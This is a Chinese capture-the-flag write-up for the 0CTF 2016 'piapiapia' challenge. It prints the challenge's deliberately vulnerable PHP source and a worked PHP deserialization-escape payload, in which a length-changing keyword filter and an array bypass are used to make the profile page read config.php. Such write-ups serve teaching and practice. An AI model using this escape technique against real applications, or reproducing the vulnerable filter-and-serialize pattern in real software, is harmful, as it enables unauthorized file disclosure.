[0CTF 2016]piapiapia

考点

反序列化逃逸

wp

www.zip泄露源码，下载审计。

index.php有登录功能，先看index.php。包含class.php，使用session判断是否登录，登录了就跳转profile.php

<?php
require_once('class.php');
if($_SESSION['username']) {
    header('Location: profile.php');
    exit;
}

然后到登录功能，获取的username和password长度必须在[3,16]这个区间内，然后使用$user->login判断账号密码是否正确，这个函数在class.php中。

if($_POST['username'] && $_POST['password']) {
	$username = $_POST['username'];
	$password = $_POST['password'];
	if(strlen($username) < 3 or strlen($username) > 16) 
		die('Invalid user name');
	if(strlen($password) < 3 or strlen($password) > 16) 
		die('Invalid password');
	if($user->login($username, $password)) {
		$_SESSION['username'] = $username;
		header('Location: profile.php');
		exit;}
	else {  die('Invalid user name or password');  }
}else{}

到class.php找$user的定义。在config.php中定义了flag和$config数组用于保存MySQL连接的相关参数。

在mysql::filter()处把'和\\替换成_，把select，insert，update，where和delete替换成hacker，可能会有反序列化逃逸。

user::login()先对POST的数据用mysql::filter()进行替换，然后在mysql::select()判断账号密码是否正确

require('config.php');
session_start();

class mysql {
	private $link = null;
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}
}
class user extends mysql{
	private $table = 'users';
	public function login($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		if ($object && $object->password === md5($password)) {
			return true;
		} else {
			return false;
		}
	}
}
$user = new user();
$user->connect($config);

再看注册，和登录要求类似，取的username和password长度必须在[3,16]这个区间内。然后调用user::is_exists判断用户是否村，调用user::register函数进行注册

require_once('class.php');
if($_POST['username'] && $_POST['password']) {
	$username = $_POST['username'];
	$password = $_POST['password'];
	if(strlen($username) < 3 or strlen($username) > 16) 
		die('Invalid user name');
	if(strlen($password) < 3 or strlen($password) > 16) 
		die('Invalid password');
	if(!$user->is_exists($username)) {
		$user->register($username, $password);
		echo 'Register OK!<a href="index.php">Please Login</a>';		
	}else {  die('User name Already Exists');  }}

user::is_exists()对输入进行mysql::filter()替换，再去执行mysql::select()判断用户是否存在

user::register()对输入进行mysql::filter()替换，再去执行mysql::insert()插入新用户

class user extends mysql{
	private $table = 'users';
	public function is_exists($username) {
		$username = parent::filter($username);
		$where = "username = '$username'";
		return parent::select($this->table, $where);
	}
	public function register($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);
		$key_list = Array('username', 'password');
		$value_list = Array($username, md5($password));
		return parent::insert($this->table, $key_list, $value_list);
	}}
class mysql {
	private $link = null;
	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}
	public function insert($table, $key_list, $value_list) {
		$key = implode(',', $key_list);
		$value = '\'' . implode('\',\'', $value_list) . '\''; 
		$sql = "INSERT INTO $table ($key) VALUES ($value)";
		return mysql_query($sql);
	}}

然后看profile.php，调用user::show_profile()函数获取profile，然后反序列化profile，获取phone，email和nickname三个属性，最后读取photo属性对应的文件

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>

user::show_profile()

class user extends mysql{
	public function show_profile($username) {
		$username = parent::filter($username);
		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}}

还有最后一个update.php，POST获取phone，email和nickname三个属性，然后获取上传的photo文件。phone是11位数字，email只由字母数字下划线组成，nickname只由字母数字下划线组成，并且长度不超过10。

这里前面两个preg_match都是有!表示取逆，第三个nickname的限制就没有，也就是这里返回FALSE，而传入数组preg_match会使返回FALSE，这就绕过限制了。

<?php
require_once('class.php');
if($_SESSION['username'] == null) {
	die('Login First');	
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
	$username = $_SESSION['username'];
	if(!preg_match('/^\d{11}$/', $_POST['phone']))
		die('Invalid phone');
	if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
		die('Invalid email');
	if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
		die('Invalid nickname');

对于上传的文件，没有过滤，保存为md5(name)，也没有后缀。然后将上传的内容（四个字段），再使用user::update_profile()执行update语句，进行更新。

$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
    die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));

user::update_profile()

class user extends mysql{
    private $table = 'users';
    public function update_profile($username, $new_profile) {
        $username = parent::filter($username);
        $new_profile = parent::filter($new_profile);
        $where = "username = '$username'";
        return parent::update($this->table, 'profile', $new_profile, $where);
    }}
class mysql {
    private $link = null;
    public function update($table, $key, $value, $where) {
        $sql = "UPDATE $table SET $key = '$value' WHERE $where";
        return mysql_query($sql);
    }}

在update.php页面更新profile的时候对profile进行serialize操作，在profile.php读取profile时进行反序列化操作，并且更新profile会使用mysql::filter()进行替换，因此会导致PHP的反序列化逃逸。在profile.php读取profile时，会把profile中photo字段对应的文件读取并输出，所以这里逃逸只要修改profile['photo']为config.php即可。

这是正常序列化的结果

a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:10:"111@qq.com";s:8:"nickname";s:4:"test";s:5:"photo";s:39:"upload/b52f6f78c93f7934d640cc67ae99fbd1";}

目标结果

a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:10:"111@qq.com";s:8:"nickname";s:4:"hacker";s:5:"photo";s:10:"config.php";}

如果nickname输入3个where，经过filter函数处理后结果如下

a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:10:"111@qq.com";s:8:"nickname";s:15:"hackerhackerhacker";s:5:"photo";s:39:"upload/b52f6f78c93f7934d640cc67ae99fbd1";}

这样就逃逸了3个字符，目标是逃逸34个字符，那就需要34个where

payload测试

<?php
function filter($string) {
	$escape = array('\'', '\\\\');
	$escape = '/' . implode('|', $escape) . '/';
	$string = preg_replace($escape, '_', $string);

	$safe = array('select', 'insert', 'update', 'delete', 'where');
	$safe = '/' . implode('|', $safe) . '/i';
	return preg_replace($safe, 'hacker', $string);
}

$profile['phone'] = '11111111111';
$profile['email'] = '111@qq.com';
$profile['nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('123.txt');
$s = serialize($profile);
echo $s."<br>";
echo filter($s);

得到结果

a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:10:"111@qq.com";s:8:"nickname";s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";s:5:"photo";s:39:"upload/b52f6f78c93f7934d640cc67ae99fbd1";}

a:4:{s:5:"phone";s:11:"11111111111";s:5:"email";s:10:"111@qq.com";s:8:"nickname";s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";s:5:"photo";s:39:"upload/b52f6f78c93f7934d640cc67ae99fbd1";}

payload：

再去访问profile.php查看图片的内容即可

上一页[CISCN2019 华北赛区 Day1 Web1]Dropbox 下一页[安洵杯 2019]easy_serialize_php

最后更新于3年前